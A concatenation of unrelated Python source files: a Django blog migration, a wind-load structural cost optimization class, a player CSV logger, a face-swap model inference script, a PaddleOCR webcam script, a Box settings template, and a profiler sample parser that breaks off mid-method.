('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes_for_collective_blog_postvote', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, unique=True, verbose_name='Name')),
('slug', models.SlugField(max_length=100, unique=True, verbose_name='Slug')),
],
options={
'verbose_name_plural': 'Tags',
'ordering': ('name',),
'verbose_name': 'Tag',
},
),
migrations.CreateModel(
name='TaggedItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_id', models.IntegerField(db_index=True, verbose_name='Object id')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='collective_blog_taggeditem_tagged_items', to='contenttypes.ContentType', verbose_name='Content type')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='collective_blog_taggeditem_items', to='collective_blog.Tag')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='post',
name='tags',
field=taggit.managers.TaggableManager(help_text='A comma-separated list of tags', through='collective_blog.TaggedItem', to='collective_blog.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='comment',
name='post',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='collective_blog.Post', verbose_name='Post'),
),
migrations.AddField(
model_name='blog',
name='members',
field=models.ManyToManyField(editable=False, through='collective_blog.Membership', to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='postvote',
unique_together=set([('user', 'object')]),
),
migrations.AlterUniqueTogether(
name='membership',
unique_together=set([('user', 'blog')]),
),
migrations.AlterUniqueTogether(
name='commentvote',
unique_together=set([('user', 'object')]),
),
]
|
import numpy as np
from scipy.integrate import simps
from StochasticMechanics import Stochastic
from Building import *
from BuildingProperties import *
from Hazards import Stationary
import copy
import time
import matplotlib.pyplot as plt
from scipy import integrate
import time
class PerformanceOpt(Stochastic):
# Performance based engineering: optimization. This is a subclass of Stochastic.
def __init__(self, power_spectrum=None, model=None, freq=None, tol=1e-5, maxiter=100, design_life=1):
self.power_spectrum = power_spectrum
self.model = model
self.freq = freq
self.tol = tol
self.maxiter = maxiter
self.design_life = design_life
self.building = building
self.columns = columns
self.slabs = slabs
self.core = core
self.concrete = concrete
self.steel = steel
self.cost = cost
self.ndof = building["ndof"]
Stochastic.__init__(self, power_spectrum=power_spectrum, model=model, ndof=self.ndof, freq=freq)
def objective_function(self, size_col=None, args=None):
# im_max: maximum intensity measure
# B_max: maximum barrier level
# ndof = 2
# im_max = 30
# B_max = 1
# ksi = np.ones((ndof)) * [0.05]
# gamma = np.ones((ndof)) * [0.5]
# nu = np.ones((ndof)) * [0.5]
# alpha = np.ones((ndof)) * [1]
# a = np.ones((ndof)) * [1.0] # 0.01
# Objective function: returns the rate of annual loss due to excessive drift.
# Parameters of the Bouc-Wen model.
ksi = args[0]
im_max = args[1]
B_max = args[2]
gamma = args[3]
nu = args[4]
alpha = args[5]
a = args[6]
# Get some properties of the building.
ndof = self.ndof
self.columns = update_columns(columns=self.columns, lx=size_col, ly=size_col)
Building = Structure(building, columns, slabs, core, concrete, steel, cost)
if len(size_col) != ndof:
raise ValueError('length of size_col is not equal to ndof!')
initial_cost = 0
k = []
# Loop over each DOF.
for i in range(ndof):
# Get properties of the columns.
self.columns = update_columns(columns=self.columns, lx=size_col[i], ly=size_col[i])
Ix = size_col[i] ** 4 / 12
Iy = Ix # Square section
area = size_col[i] ** 2 # square section
#Get the stifness and cost.
Building = Structure(building, columns, slabs, core, concrete, steel, cost)
Cost = Costs(building, columns, slabs, core, concrete, steel, cost)
stiffness = Building.stiffness_story()
k.append(stiffness)
initial_cost = initial_cost + Cost.initial_cost_stiffness(col_size=size_col[i], par0=25.55133, par1=0.33127)
# k[end] top floor
k = np.array(k) # Stifness vector.
mass = Building.mass_storey(top_story=False) # mass per story.
mass_top = Building.mass_storey(top_story=True) # mass in the top story.
m = np.ones((ndof)) * [mass] # Mass vector.
m[-1] = mass_top # Top floor is m[end] - include water reservoir
# Estimate the damping.
c = PerformanceOpt.linear_damping(self, m=m, k=k, ksi=ksi)
# Determine the matrices M, C, and K.
M, C, K = PerformanceOpt.create_mck(self, m=m, c=c, k=k, gamma=gamma, nu=nu, alpha=alpha, a=a)
# Estimate the rate of financial loss.
financial_loss_rate = PerformanceOpt.annual_financial_loss(self, M=M, C=C, K=K, stiff=k, im_max=im_max,
B_max=B_max, size_col=size_col, gamma=gamma, nu=nu,
alpha=alpha, a=a)
# Estimate the total loss considering the design life of the building (e.g., 50 years converted into seconds).
total_loss = financial_loss_rate * self.design_life
# total_cost = total loss.
total_cost = initial_cost + total_loss
print(size_col)
print(total_cost)
# return total_cost, initial_cost, total_loss
return total_cost
def annual_financial_loss(self, M=None, C=None, K=None, stiff=None, im_max=None, B_max=None, size_col=None,
**kwargs):
# Estimate the annual financial loss.
im = im_max #Intensity measure.
B = B_max # Barrier B: interstory drift ratio.
# Determine the cost of failure.
CostFailure = Costs(building=building, columns=columns, slabs=slabs, core=core, concrete=concrete,
steel=steel, cost=cost)
# Properties of the excitation PSD.
kv = wind["kv"]
Av = wind["Av"]
if 'a' in kwargs.keys():
a = kwargs['a']
for i in range(ndof):
if a[i] < 0:
raise ValueError('a cannot be less than 0.')
else:
raise ValueError('a cannot be None.')
start_time = time.time()
Nim = 100
NB = 100
imvec = np.linspace(0.00001, im_max, Nim)
dIM = imvec[1] - imvec[0]
# Compute the duble integral pf the PBDO framework: check paper (Beck, dos Santos, and Kougioumtzoglou, 2014)
integ = np.zeros(self.ndof)
integral_IM = np.zeros((Nim, self.ndof))
# Loop over the intensity measure (IM).
for i in range(Nim):
# Intensity measure.
im = imvec[i]
# Power spectrum.
Ps = Stationary(power_spectrum_object='windpsd', ndof=self.ndof)
power_spectrum, ub = Ps.power_spectrum_excitation(u10=im, freq=self.freq, z=z)
# Sto = Stochastic(power_spectrum=power_spectrum, model=self.model, ndof=ndof, freq=self.freq)
#start_time = time.time()
# Statistical linearization. Var = Variance of displacement, Vard = Variance of velocity.
Var, Vard = PerformanceOpt.statistical_linearization(self, M=M, C=C, K=K, power_sp=power_spectrum,
tol=self.tol, maxiter=self.maxiter, **kwargs)
#end_time = time.time()
#timef = end_time - start_time
#print('Time: ' + str(timef))
Var = Var.T
Vard = Vard.T
Var = Var[0]
Vard = Vard[0]
# Estimate the wind force: aeroelasticity.
rho = wind["rho"]
Cd = wind["Cd"]
L = columns["height"]
ncolumns = columns["quantity"]
building_area = building["height"] * building["width"]
wind_force = rho * Cd * (building_area / 2) * (ub ** 2)
meanY = Stochastic.linear_mean_response(stiff, wind_force, a)
# Loop over the Barrier B.
integral_B = []
for j in range(self.ndof):
B_min = max(0, meanY[j] - 1.96 * np.sqrt(Var[j]))
B_max = max(0, meanY[j] + 1.96 * np.sqrt(Var[j]))
if B_min <= 0:
B_min = 0.0001
Bvec = np.linspace(B_min, B_max, NB)
dB = Bvec[1] - Bvec[0]
up_rate = []
for l in range(NB):
B = Bvec[l]
# Estimate the up-crossing rate.
up_crossing_rate = ((np.sqrt(Vard[j] / Var[j])) / (2 * np.pi)) * \
np.exp(-((B - meanY[j]) ** 2) / (2 * Var[j]))
h = 0.00001
Cf0 = CostFailure.cost_damage(b=B - h, col_size=size_col[j], L=L, ncolumns=ncolumns,
dry_wall_area=dry_wall_area)
Cf1 = CostFailure.cost_damage(b=B + h, col_size=size_col[j], L=L, ncolumns=ncolumns,
dry_wall_area=dry_wall_area)
Cf = abs((Cf1 - Cf0) / (2 * h))
# Cf = CostFailure.cost_damage(b=B, col_size=size_col[j], L=L, ncolumns=ncolumns,
# dry_wall_area=dry_wall_area)
rate = Cf * up_crossing_rate * Stationary.weibull(im=im, kv=kv, Av=Av) # gumbel, weibull
up_rate.append(rate) # TImes 2?
# integral_B.append(simps(np.array(up_rate), Bvec)*dIM)
# integ[j] = integ[j] + simps(np.array(up_rate), Bvec)*dIM
integral_IM[i, j] = simps(np.array(up_rate), Bvec)
soma = 0
for j in range(self.ndof):
soma = soma + simps(integral_IM[:, j], imvec)
# financial_loss_rate = PerformanceOpt.func_integral(B=B_max, im=im_max, M=M, C=C, K=K, stiff=stiff,
# z=z, freq=self.freq, model=self.model, ndof=self.ndof,
# tol=self.tol, maxiter=self.maxiter, kwargs=kwargs)
# v = integrate.dblquad(PerformanceOpt.func_integral, 0, im_max, lambda B: 0, lambda B: B_max,
# args=[M, C, K, stiff, z, self.freq, self.model, self.ndof, self.tol, self.maxiter, kwargs])
financial_loss_rate = 60 * 60 * 24 * 30 * 12 * soma
# print(power_spectrum[10,:])
# print(Var)
end_time = time.time()
timef = end_time - start_time
print('Time: ' + str(timef))
return financial_loss_rate
@staticmethod
def func_integral(B=None, im=None, M=None, C=None, K=None, stiff=None, z=None, freq=None, model=None,
ndof=None, tol=None, maxiter=None, kwargs=None):
Ps = Stationary(power_spectrum_object='windpsd', ndof=ndof)
power_spectrum, ub = Ps.power_spectrum_excitation(u10=im, freq=freq, z=z)
Sto = Stochastic(power_spectrum=power_spectrum, model=model, ndof=ndof, freq=freq)
Var, Vard = Sto.statistical_linearization(M=M, C=C, K=K, tol=tol, maxiter=maxiter, **kwargs)
Var = Var.T
Vard = Vard.T
Var = Var[0]
Vard = Vard[0]
rho = wind["rho"]
Cd = wind["Cd"]
building_area = building["height"] * building["width"]
wind_force = rho * Cd * (building_area / 2) * (ub ** 2)
meanY = Stochastic.linear_mean_response(stiff, wind_force)
up_crossing_rate = ((np.sqrt(Vard / Var)) / (2 * np.pi)) * np.exp(-((B - meanY) ** 2) / (2 * Var))
kv = wind["kv"]
Av = wind["Av"]
Cf = 1000 # example only
# rate = Cf * up_crossing_rate * Stationary.gumbel(im=im, kv=kv, Av=Av) # Annual rate
rate = Cf * up_crossing_rate * Stationary.weibull(im=im, kv=kv, Av=Av) # Annual rate
return rate[0]
#================================================== UNDER CONSTRUCTION ==============================================================
# The methods presented next are used in the stochastic gradient descent framework.
# def initial_cost(self, m=None, c=None, k=None, num_cols_floor=None, cost_cols):
#
# ndof = self.ndof
#
# for i in range(ndof)
def objective_function_sto(self, size_col=None, args=None):
# im_max: maximum intensity measure
# B_max: maximum barrier level
# ndof = 2
# im_max = 30
# B_max = 1
# ksi = np.ones((ndof)) * [0.05]
# gamma = np.ones((ndof)) * [0.5]
# nu = np.ones((ndof)) * [0.5]
# alpha = np.ones((ndof)) * [1]
# a = np.ones((ndof)) * [1.0] # 0.01
# Method under development: objective function used in the stochastic gradient descent.
ksi = args[0]
im_max = args[1]
B_max = args[2]
gamma = args[3]
nu = args[4]
alpha = args[5]
a = args[6]
nsim = args[7]
ndof = self.ndof
self.columns = update_columns(columns=self.columns, lx=size_col, ly=size_col)
Building = Structure(building, columns, slabs, core, concrete, steel, cost)
if len(size_col) != ndof:
raise ValueError('length of size_col is not equal to ndof!')
initial_cost = 0
k = []
for i in range(ndof):
self.columns = update_columns(columns=self.columns, lx=size_col[i], ly=size_col[i])
Ix = size_col[i] ** 4 / 12
Iy = Ix # Square section
area = size_col[i] ** 2 # square section
Building = Structure(building, columns, slabs, core, concrete, steel, cost)
Cost = Costs(building, columns, slabs, core, concrete, steel, cost)
stiffness = Building.stiffness_story()
k.append(stiffness)
initial_cost = initial_cost + Cost.initial_cost_stiffness(col_size=size_col[i], par0=25.55133, par1=0.33127)
# k[end] top floor
k = np.array(k)
mass = Building.mass_storey(top_story=False)
mass_top = Building.mass_storey(top_story=True)
m = np.ones((ndof)) * [mass]
#m[-1] = mass_top # Top floor is m[end] - include water reservoir
# Estimate the damping.
c = PerformanceOpt.linear_damping(self, m=m, k=k, ksi=ksi)
M, C, K = PerformanceOpt.create_mck(self, m=m, c=c, k=k, gamma=gamma, nu=nu, alpha=alpha, a=a)
financial_loss_rate = PerformanceOpt.annual_financial_loss_sto(self, M=M, C=C, K=K, stiff=k, im_max=im_max,
B_max=B_max, size_col=size_col, gamma=gamma, nu=nu,
alpha=alpha, a=a, nsim=nsim)
total_loss = financial_loss_rate * self.design_life
total_cost = initial_cost + total_loss
# return total_cost, initial_cost, total_loss
return total_cost
def annual_financial_loss_sto(self, M=None, C=None, K=None, stiff=None, im_max=None, B_max=None, size_col=None,
**kwargs):
# Under development: usend in the estimation of the annual financial loss in the stochastic gradient descent framework.
#im = im_max
#B = B_max
#print([im,B])
CostFailure = Costs(building=building, columns=columns, slabs=slabs, core=core, concrete=concrete,
steel=steel, cost=cost)
kv = wind["kv"]
Av = wind["Av"]
if 'a' in kwargs.keys():
a = kwargs['a']
for i in range(ndof):
if a[i] < 0:
raise ValueError('a cannot be less than 0.')
else:
raise ValueError('a cannot be None.')
#nsim = 500
if 'nsim' in kwargs.keys():
nsim = kwargs['nsim']
if nsim < 1:
raise ValueError('nsim cannot be less than 1.')
if not isinstance(nsim,int):
raise TypeError('nsim must be integer.')
else:
raise ValueError('nsim cannot be None.')
soma = np.zeros(ndof)
for i in range(nsim):
im = im_max*np.random.rand()
#B = B_max*np.random.rand()
# Compute
Ps = Stationary(power_spectrum_object='windpsd', ndof=self.ndof)
power_spectrum, ub = Ps.power_spectrum_excitation(u10=im, freq=self.freq, z=z)
#start_time = time.time()
Var, Vard = PerformanceOpt.statistical_linearization(self, M=M, C=C, K=K, power_sp=power_spectrum,
tol=self.tol, maxiter=self.maxiter, **kwargs)
#end_time = time.time()
#timef = end_time - start_time
#print('Time: ' + str(timef))
Var = Var.T
Vard = Vard.T
Var = Var[0]
Vard = Vard[0]
rho = wind["rho"]
Cd = wind["Cd"]
L = columns["height"]
ncolumns = columns["quantity"]
building_area = building["height"] * building["width"]
wind_force = rho * Cd * (building_area / 2) * (ub ** 2)
meanY = Stochastic.linear_mean_response(stiff, wind_force, a)
financial_loss_rate = 0
lr_ndof = []
for j in range(self.ndof):
B_min = max(0, meanY[j] - 1.96 * np.sqrt(Var[j]))
B_max = max(0, meanY[j] + 1.96 * np.sqrt(Var[j]))
if B_min <= 0:
B_min = 0.0001
B = (B_max-B_min)*np.random.rand()+B_min
up_crossing_rate = ((np.sqrt(Vard[j] / Var[j])) / (2 * np.pi)) * \
np.exp(-((B - meanY[j]) ** 2) / (2 * Var[j]))
h = 0.00001
Cf0 = CostFailure.cost_damage(b=B - h, col_size=size_col[j], L=L, ncolumns=ncolumns,
dry_wall_area=dry_wall_area)
Cf1 = CostFailure.cost_damage(b=B + h, col_size=size_col[j], L=L, ncolumns=ncolumns,
dry_wall_area=dry_wall_area)
Cf = abs((Cf1 - Cf0) / (2 * h))
#Cf = CostFailure.cost_damage(b=B, col_size=size_col[j], L=L, ncolumns=ncolumns,
# dry_wall_area=dry_wall_area)
loss_rate = Cf * up_crossing_rate * Stationary.weibull(im=im, kv=kv, Av=Av) # gumbel, weibull
soma[j] = soma[j] + loss_rate*(B_max-B_min)*im_max/nsim
#avg_loss = (soma/nsim)*B_max*im_max
financial_loss_rate = 60 * 60 * 24 * 30 * 12 * (np.sum(soma))
#print(soma)
return financial_loss_rate
def annual_financial_loss_sto_(self, M=None, C=None, K=None, stiff=None, im_max=None, B_max=None, size_col=None,
**kwargs):
im = im_max
B = B_max
print([im,B])
CostFailure = Costs(building=building, columns=columns, slabs=slabs, core=core, concrete=concrete,
steel=steel, cost=cost)
kv = wind["kv"]
Av = wind["Av"]
if 'a' in kwargs.keys():
a = kwargs['a']
for i in range(ndof):
if a[i] < 0:
raise ValueError('a cannot be less than 0.')
else:
raise ValueError('a cannot be None.')
# Compute
Ps = Stationary(power_spectrum_object='windpsd', ndof=self.ndof)
power_spectrum, ub = Ps.power_spectrum_excitation(u10=im, freq=self.freq, z=z)
start_time = time.time()
Var, Vard = PerformanceOpt.statistical_linearization(self, M=M, C=C, K=K, power_sp=power_spectrum,
tol=self.tol, maxiter=self.maxiter, **kwargs)
end_time = time.time()
timef = end_time - start_time
print('Time: ' + str(timef))
Var = Var.T
Vard = Vard.T
Var = Var[0]
Vard = Vard[0]
rho = wind["rho"]
Cd = wind["Cd"]
L = columns["height"]
ncolumns = columns["quantity"]
building_area = building["height"] * building["width"]
wind_force = rho * Cd * (building_area / 2) * (ub ** 2)
meanY = Stochastic.linear_mean_response(stiff, wind_force, a)
financial_loss_rate = 0
for j in range(self.ndof):
up_crossing_rate = ((np.sqrt(Vard[j] / Var[j])) / (2 * np.pi)) * \
np.exp(-((B - meanY[j]) ** 2) / (2 * Var[j]))
#h = 0.00001
#Cf0 = CostFailure.cost_damage(b=B - h, col_size=size_col[j], L=L, ncolumns=ncolumns,
# dry_wall_area=dry_wall_area)
#Cf1 = CostFailure.cost_damage(b=B + h, col_size=size_col[j], L=L, ncolumns=ncolumns,
# dry_wall_area=dry_wall_area)
#Cf = abs((Cf1 - Cf0) / (2 * h))
Cf = CostFailure.cost_damage(b=B, col_size=size_col[j], L=L, ncolumns=ncolumns,
dry_wall_area=dry_wall_area)
loss_rate = Cf * up_crossing_rate * Stationary.weibull(im=im, kv=kv, Av=Av) # gumbel, weibull
financial_loss_rate = financial_loss_rate + 60 * 60 * 24 * 30 * 12 * (loss_rate)
return financial_loss_rate
|
import os.path as path
from pathlib import Path
import csv
from datetime import datetime
import platform
filepath = str(Path(__file__).parents[2])+'/data/'
def player_to_csv(player_entry):
global filepath
now = datetime.now()
if platform.system() == 'Windows':
timestamp = now.strftime("%m/%d/%Y %T")
else:
timestamp = now.strftime("%m/%d/%Y %H:%M:%S")
discord = player_entry['discord']
uplay = player_entry['uplay']
rank = player_entry['rank']
level = player_entry['level']
with open(path.join(filepath, 'sheet_raw.csv'), 'a+', newline='') as f:
# Create a writer object from csv module
csv_writer = csv.writer(f)
# Add contents of list as last row in the csv file
csv_writer.writerow([timestamp, discord, uplay, rank, level])
def clear_csv():
global filepath
with open(f'{filepath}sheet_raw.csv', 'r') as f:
csv_reader = list(csv.reader(f))
csv_header = csv_reader[0]
with open('sheet_raw.csv', 'w') as f:
csv_writer = csv.writer(f)
csv_writer.writerow(csv_header)
|
import time
import torch
import os
from options.test_options import TestOptions
from data import create_dataset
from models import create_model
import random
from PIL import Image
import numpy as np
import glob
from torchvision import transforms
input_folder = ["/root/FaceDataset/FFHQ/images256x256/", "/root/FaceDataset/celeba_hq/images256x256/"]
output_folder = "./sample/output/"
output_visual_folder = "./sample/output_visual/"
CKPTS = "./checkpoints/all-epochx"
NUMBER_OF_COUPLE = 100
if __name__ == '__main__':
opt = TestOptions().parse() # get test options
# hard-code some parameters for test
opt.num_threads = 0 # test code only supports num_threads = 1
opt.batch_size = 1 # test code only supports batch_size = 1
opt.serial_batches = True # disable data shuffling; comment this line if results on randomly chosen images are needed.
opt.no_flip = True # no flip; comment this line if results on flipped images are needed.
opt.display_id = -1 # no visdom display; the test code saves the results to a HTML file.
device = torch.device(f"cuda:{opt.gpu_ids[0]}" if torch.cuda.is_available() else 'cpu')
model = create_model(opt) # create a model given opt.model and other options
model.netG.load_state_dict(torch.load(CKPTS + "/latest_net_G.pth", map_location=str(device)))
model.netE.load_state_dict(torch.load(CKPTS + "/latest_net_E.pth", map_location=str(device)))
model.netZ.load_state_dict(torch.load(CKPTS + "/latest_net_Z.pth", map_location=str(device)))
model.setup(opt) # regular setup: load and print networks; create schedulers
model.eval()
# model.freeze() # run inference
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
list_source_img = []
for i in input_folder:
list_source_img.extend(glob.glob(i + "*.png"))
source_index_list = random.sample(range(0, len(list_source_img)), NUMBER_OF_COUPLE)
target_index_list = random.sample(range(0, len(list_source_img)), NUMBER_OF_COUPLE)
for index in range(1):
source_path = list_source_img[source_index_list[index]]
target_path = list_source_img[target_index_list[index]]
source_img_orgin = Image.open(source_path)
target_img_orgin = Image.open(target_path)
source_img = transform(source_img_orgin).unsqueeze(0).to(device)
target_img = transform(target_img_orgin).unsqueeze(0).to(device)
print(source_img.max(), source_img.min())
start_time = time.time()
with torch.no_grad():
model.forward(target_img, source_img)
output_img = model.fake
print("Time: ", time.time() - start_time)
output_img = (output_img + 1) / 2.0
output_path = os.path.basename(source_path)[:-4] + "to" + os.path.basename(target_path)[:-4]+".jpg"
# print(output.max(), output.min())
output_img = transforms.ToPILImage()(output_img.cpu().squeeze().clamp(0,1))
output_img.save(output_folder + output_path)
list_img = [source_img_orgin, target_img_orgin, output_img]
imgs_comb = np.hstack(np.asarray(list_img))
imgs_comb = Image.fromarray(imgs_comb)
imgs_comb.save(output_visual_folder + output_path)
|
# -*- coding: utf-8 -*-
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
reload(sys)
sys.setdefaultencoding('utf8')
__dir__ = os.path.dirname(os.path.abspath(__file__))
sys.path.append(__dir__)
sys.path.append(os.path.abspath(os.path.join(__dir__, '../..')))
import tools.infer.utility as utility
from ppocr.utils.utility import initial_logger
logger = initial_logger()
import cv2
import tools.infer.predict_det as predict_det
import tools.infer.predict_rec as predict_rec
import tools.infer.predict_cls as predict_cls
import copy
import numpy as np
import math
import time
from ppocr.utils.utility import get_image_file_list, check_and_read_gif
from PIL import Image
from tools.infer.utility import draw_ocr
from tools.infer.utility import draw_ocr_box_txt
use_angle_cls = True
class TextSystem(object):
def __init__(self):
self.text_detector = predict_det.TextDetector()
self.text_recognizer = predict_rec.TextRecognizer()
self.use_angle_cls = use_angle_cls
if self.use_angle_cls:
self.text_classifier = predict_cls.TextClassifier()
def get_rotate_crop_image(self, img, points):
'''
img_height, img_width = img.shape[0:2]
left = int(np.min(points[:, 0]))
right = int(np.max(points[:, 0]))
top = int(np.min(points[:, 1]))
bottom = int(np.max(points[:, 1]))
img_crop = img[top:bottom, left:right, :].copy()
points[:, 0] = points[:, 0] - left
points[:, 1] = points[:, 1] - top
'''
img_crop_width = int(
max(
np.linalg.norm(points[0] - points[1]),
np.linalg.norm(points[2] - points[3])))
img_crop_height = int(
max(
np.linalg.norm(points[0] - points[3]),
np.linalg.norm(points[1] - points[2])))
pts_std = np.float32([[0, 0], [img_crop_width, 0],
[img_crop_width, img_crop_height],
[0, img_crop_height]])
M = cv2.getPerspectiveTransform(points, pts_std)
dst_img = cv2.warpPerspective(
img,
M, (img_crop_width, img_crop_height),
borderMode=cv2.BORDER_REPLICATE,
flags=cv2.INTER_CUBIC)
dst_img_height, dst_img_width = dst_img.shape[0:2]
if dst_img_height * 1.0 / dst_img_width >= 1.5:
dst_img = np.rot90(dst_img)
return dst_img
def print_draw_crop_rec_res(self, img_crop_list, rec_res):
bbox_num = len(img_crop_list)
for bno in range(bbox_num):
cv2.imwrite("./output/img_crop_%d.jpg" % bno, img_crop_list[bno])
print(bno, rec_res[bno])
def __call__(self, img):
ori_im = img.copy()
dt_boxes, elapse = self.text_detector(img)
print("dt_boxes num : {}, elapse : {}".format(len(dt_boxes), elapse))
if dt_boxes is None:
return None, None
img_crop_list = []
dt_boxes = sorted_boxes(dt_boxes)
for bno in range(len(dt_boxes)):
tmp_box = copy.deepcopy(dt_boxes[bno])
img_crop = self.get_rotate_crop_image(ori_im, tmp_box)
img_crop_list.append(img_crop)
if self.use_angle_cls:
img_crop_list, angle_list, elapse = self.text_classifier(
img_crop_list)
print("cls num : {}, elapse : {}".format(
len(img_crop_list), elapse))
rec_res, elapse = self.text_recognizer(img_crop_list)
print("rec_res num : {}, elapse : {}".format(len(rec_res), elapse))
# self.print_draw_crop_rec_res(img_crop_list, rec_res)
return dt_boxes, rec_res
def sorted_boxes(dt_boxes):
"""
Sort text boxes in order from top to bottom, left to right
args:
dt_boxes(array):detected text boxes with shape [4, 2]
return:
sorted boxes(array) with shape [4, 2]
"""
num_boxes = dt_boxes.shape[0]
sorted_boxes = sorted(dt_boxes, key=lambda x: (x[0][1], x[0][0]))
_boxes = list(sorted_boxes)
for i in range(num_boxes - 1):
if abs(_boxes[i + 1][0][1] - _boxes[i][0][1]) < 10 and \
(_boxes[i + 1][0][0] < _boxes[i][0][0]):
tmp = _boxes[i]
_boxes[i] = _boxes[i + 1]
_boxes[i + 1] = tmp
return _boxes
def point_offset(_boxes):
# 计算偏移量
if len(_boxes) > 0:
len(_boxes)
l = round(0.5 * len(_boxes))
dt_boxes = np.array(_boxes)
boxes = dt_boxes[l, :]
leftpoint1 = boxes[0, :]
righttpoint1 = boxes[2, :]
leftpoint = (leftpoint1[0] + righttpoint1[0]) * 0.5
righttpoint = (leftpoint1[1] + righttpoint1[1]) * 0.5
offset = (leftpoint - 320) ** 2 + (righttpoint - 240) ** 2
offset = offset ** 0.5
return offset
capture = cv2.VideoCapture(0)
def main():
#image_file_list = get_image_file_list(args.image_dir)
while(True):
ref, frame = capture.read()
# 翻转图像
img = frame.copy()
if ref == True:
frame = cv2.flip(frame, 0)
img = cv2.flip(img,1)
frame = np.array(frame)
text_sys = TextSystem()
#img = cv2.imread(frame)
#starttime = time.time()
dt_boxes, rec_res = text_sys(frame)
#elapse = time.time() - starttime
#logger.info("Predict time of %s: %.3fs" % (frame, elapse))
for text, score in rec_res:
logger.info("{}, {:.3f}".format(text, score))
cv2.imshow("video",img)
cv2.waitKey(50)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""Example Box local settings file. Copy this file to local.py and change
these settings.
"""
# Get an app key and secret at https://www.box.com/developers/apps
BOX_KEY = None
BOX_SECRET = None
|
import struct
import subprocess
import bisect
import collections
SAMP = struct.Struct("IIQ4QIIQ")
class SamplerFile(object):
NTRACE = 4
FLAGS, COUNT, RIP, TRACE0 = range(4)
LATENCY, SOURCE, LOAD_ADDRESS = range(TRACE0+NTRACE, TRACE0+NTRACE+3)
def __init__(self, fp):
if isinstance(fp, basestring):
fp = file(fp, "rb")
self.__fp = fp
# Read CPUs
self.ncpu, = struct.unpack("Q", fp.read(8))
self.__segments = []
cpuinfo = struct.Struct("QQ")
for cpu in range(self.ncpu):
self.__segments.append(cpuinfo.unpack(fp.read(cpuinfo.size)))
def read_cpu(self, cpu):
if cpu < 0 or cpu >= self.ncpu:
return []
start, length = self.__segments[cpu]
fp = self.__fp
fp.seek(start)
count = length / SAMP.size
res = [None] * count
for i in xrange(count):
res[i] = SAMP.unpack(fp.read(SAMP.size))
return res
class Symbols(object):
def __init__(self, obj):
self.__addrs = []
self.__info = []
for info in subprocess.check_output(["nm", "-Cn", obj]).splitlines():
parts = info.split(None, 2)
self.__addrs.append(int(parts[0], 16))
self.__info.append((parts[1], parts[2]))
def lookup(self, addr):
i = bisect.bisect_right(self.__addrs, addr) - 1
if i < 0 or i == len(self.__addrs) - 1:
return Symbol(addr, None, None)
return Symbol(addr, self.__info[i][1], self.__addrs[i])
class Symbol(collections.namedtuple("Symbol", "addr name base")):
def __str__(self):
if self.name:
if self.base == self.addr:
return self.name
return "%s+%#x" % (self.name, self.addr - self.base)
return "%#016x" % self.addr
class Addr2line(object):
def __init__(self, obj):
self.__p = subprocess.Popen(["addr2line", "-Cfsie", obj],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
self.__cache = {}
def lookup(self, pc):
if pc in self.__cache:
return self.__cache[pc]
print >> self.__p.stdin, "%#x" % pc
# Add a dummy record so we can detect termination
print >> self.__p.stdin
frames = []
self.__cache[pc] = frames
while True:
func = self.__p.stdout.readline().strip()
source = self.__p.stdout.readline().strip()
if len(frames) and func == "??":
# Found dummy record
break
fname, line = source.split(":")
line = int(line)
frames.append(Frame(pc, func, fname, line))
pc = 0
return frames
class Frame(collections.namedtuple("Frame", "pc func fname line")):
def __str__(self):
if self.pc:
pc = "%016x" % self.pc
else:
pc = "%-16s" % "(inlined by)"
return "%s %s:%d %s" % (pc, self.fname, self.line, self.func)
class Histogram(object):
def __init__(self):
self.__counts = collections.Counter()
self.min = self.max = self.mean = None
self.samples = self.weight = 0
def add(self, weight, count=1):
self.__counts[weight] += count
if self.min == None:
self.min = self.max = weight
elif weight < self.min:
self.min = weight
elif weight > self.max:
self.max = weight
self.samples += count
self.weight += weight * count
self.mean = self.weight / self.samples
def to_line(self, width = 72, right = None, label = True):
if self.min == None:
return " " * width
CHARS = map(unichr, range(0x2581, 0x2589))
left = min(0, self.min)
if right is None:
right = max(0, self.max)
if left == right:
return "%s %s %s" % (self.min, CHARS[-1], self.max)
leftLabel = (str(left) + " ") if label and left != 0 else ""
rightLabel = (" " + str(right)) if label and right != 0 else ""
width = max(width - len(leftLabel) - len(rightLabel), 1)
bucket_width = float(right - left) / width
buckets = [0] * width
for weight, count in self.__counts.items():
buckets[min(int((weight - left) / bucket_width),
width - 1)] += count
maxbucket = max(buckets)
res = []
for b in buckets:
if b == 0:
res.append(u" ")
else:
res.append(CHARS[min(b * len(CHARS) / maxbucket, len(CHARS)-1)])
return "%s%s%s" % (leftLabel, "".join(res), rightLabel)
class HistTree(object):
def __init__(self, parent=None):
self.__parent = parent
self.__hists = {}
self.__my_hist = Histogram()
def add(self, path, weight, count=1):
self.__my_hist.add(weight, count)
if len(path):
key = path[0]
if key not in self.__hists:
self.__hists[key] = HistTree(self)
self.__hists[key].add(path[1:], weight, count)
@property
def hist(self):
"""Return the cumulative histogram of all children."""
return self.__my_hist
@property
def parent(self):
return self.__parent
@property
def fraction_of_parent(self):
"""Return the fraction of the parent's weight that belongs to
the histogram tree rooted at self."""
